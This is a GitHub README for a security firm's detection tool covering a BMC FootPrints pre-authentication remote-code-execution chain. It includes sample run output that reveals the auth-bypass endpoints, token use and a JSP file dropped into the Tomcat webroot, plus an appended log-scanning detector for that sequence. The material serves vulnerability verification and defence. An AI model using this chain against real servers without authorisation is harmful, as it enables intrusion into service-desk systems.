watchtowrlabs/watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260

GitHub: watchtowrlabs/watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260

BMC FootPrints pre-authentication RCE vulnerability chain detection tool. It combines the CVE-2025-71257 authentication bypass with the CVE-2025-71260 code execution to verify whether a target system is vulnerable.

Stars: 1 | Forks: 0

# CVE-2025-71257 and CVE-2025-71260: BMC FootPrints Pre-Authentication Remote Code Execution Chain

BMC FootPrints pre-authentication remote code execution chain detection artifact generator.

# Description

This detection artifact generator verifies whether a BMC FootPrints instance is vulnerable to CVE-2025-71257 and CVE-2025-71260.

The detection artifact generator attempts two actions:

* Bypass authentication via CVE-2025-71257. This check is highly accurate.
* If that succeeds, it attempts to verify the CVE-2025-71260 RCE by writing a randomly named .jsp file to the Tomcat server's webroot. The .jsp file only enumerates system information.

# Detection in Practice

Testing against a vulnerable instance:

```
python3 watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py http://192.168.2.2

watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py
(*) BMC Footprints Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool - Sonny , watchTowr (sonny@watchTowr.com)
CVEs: [CVE-2025-71257, CVE-2025-71260]
============================================================
Detection Artifact Generator Tool
============================================================
Target: http://192.168.2.2
[+] Making first request to: http://192.168.2.2/footprints/servicedesk/passwordreset/request/
[+] Successfully extracted SEC_TOKEN: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h
[+] Making second request to: http://192.168.2.2footprints/servicedesk/aspnetconfig
[+] Using token: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h
[+] Using randomized JSP name: MNdeu12Wf
[+] Making third request to: http://192.168.2.2/MNdeu12Wf.jsp (randomized artifact)
==================================================
EXTRACTED INFORMATION:
==================================================
Username: LOCAL SERVICE
Working Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0
==================================================
[+] Detection Artifact Generator Completed!
```

# Affected Versions

`BMC FootPrints: from 20.20.02 to 20.24.01.001`

# Available Hotfixes

`20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, 20.24.01`

Reference: https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research, follow the [watchTowr](https://watchTowr.com) Labs team:

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
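The generator's output above shows the chain as three requests in a fixed order: the password-reset request page, the `aspnetconfig` endpoint, then a randomly named `.jsp` fetched straight from the webroot. The following is an added example, not code from the watchTowr tool, of detection logic that walks Tomcat access log lines for that same sequence per client IP; the log lines are constructed, and the rule assumes a stock FootPrints deployment does not serve arbitrary `.jsp` files from the webroot.

```python
import re
from collections import defaultdict

# Constructed sample Tomcat access log lines (common log format); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2026:10:00:01 +0000] "GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2026:10:00:02 +0000] "POST /footprints/servicedesk/aspnetconfig HTTP/1.1" 200 310
10.0.0.5 - - [01/Jan/2026:10:00:03 +0000] "GET /MNdeu12Wf.jsp HTTP/1.1" 200 890
10.0.0.9 - - [01/Jan/2026:10:05:00 +0000] "GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2026:10:05:30 +0000] "GET /footprints/servicedesk/login HTTP/1.1" 200 4000
"""

# client, method, path, status from a common-log-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# The three stages of the chain, in the order the generator performs them.
# Stage 3 is a JSP requested directly from the webroot (assumption: FootPrints
# itself serves no such files, so any hit is an artifact worth triage).
STAGES = (
    ("passwordreset_request", lambda p: p.startswith("/footprints/servicedesk/passwordreset/request")),
    ("aspnetconfig", lambda p: p.startswith("/footprints/servicedesk/aspnetconfig")),
    ("webroot_jsp", lambda p: re.fullmatch(r"/[A-Za-z0-9_-]+\.jsp", p) is not None),
)


def scan(log_text):
    """Map each client IP to (stages_completed, [stage names seen]) for the chain above."""
    state = defaultdict(lambda: [0, []])
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        ip, _method, path, _status = m.groups()
        stage = state[ip][0]
        # Only advance when the next expected stage is seen; order matters for the chain.
        if stage < len(STAGES) and STAGES[stage][1](path):
            state[ip][0] = stage + 1
            state[ip][1].append(STAGES[stage][0])
    return {ip: (n, names) for ip, (n, names) in state.items()}


def suspicious_clients(log_text, min_stage=2):
    """Clients that at least reached the aspnetconfig step (the auth-bypass stage) in order."""
    return sorted(ip for ip, (n, _) in scan(log_text).items() if n >= min_stage)
```

A lone hit on the password-reset page is normal user traffic, so the default threshold only reports clients that went on to `aspnetconfig`; a stage-3 hit means a webroot JSP was requested and the host should be treated as potentially compromised.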
Tags: BMC FootPrints, CISA Project, CVE-2025-71257, CVE-2025-71260, ITSM, JSP, Maven, meg, PoC, RCE, Tomcat, Webshell, Information Security, Brute Force, Service Desk System, Vulnerability Verification, Programming Tools, Authentication Bypass, Remote Code Execution, Reverse Engineering Tools